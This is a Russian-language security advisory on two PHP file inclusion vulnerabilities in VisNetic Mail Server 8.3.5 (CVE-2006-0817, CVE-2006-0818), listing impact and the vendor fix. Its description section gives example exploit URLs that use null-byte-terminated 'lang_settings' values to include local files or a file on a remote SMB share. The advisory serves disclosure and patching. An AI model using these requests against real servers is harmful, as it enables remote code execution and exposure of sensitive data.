PHP-инклюдинг в VisNetic Mail Server

Дата публикации:
17.07.2006
Дата изменения:
29.12.2008
Всего просмотров:
2056
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-0817
CVE-2006-0818
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
VisNetic Mail Server 8.x
Уязвимые версии: VisNetic Mail Server 8.3.5, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "language" и "lang_settings" в функции "securepath()" в сценариях "/accounts/inc/include.php" и "/admin/inc/include.php". Удаленный пользователь может внедрить PHP кодв лог файл и затем выполнить его выполнить, указав полный путь к файлу на Windows системе. Пример:

http://[host]:32000/admin/inc/include.php?language=0&lang_settings[0][1]=c:\[file]%00

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "language" в сценарии "/mail/settings.html" перед записью данных в базу данных. Удаленный пользователь может переписать значение переменной "lang_settings" и подключить произвольные файлы на локальной системе. Для удачной эксплуатации уязвимости требуется валидная учетная запись. Пример:

http://[host]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;c:\[file]%00;
http://[host]:32000/mail/index.html?id=[curent_id]&lang_settings[TEST]=test;&lang_settings[TEST]=test;\\[host]\[share]\[file]%00;

URL производителя: www.deerfield.com/products/visnetic-mailserver

Решение: Установите последнюю версию (8.5.0.5) с сайта производителя.

Ссылки: VisNetic Mail Server Two File Inclusion Vulnerabilities

или введите имя

CAPTCHA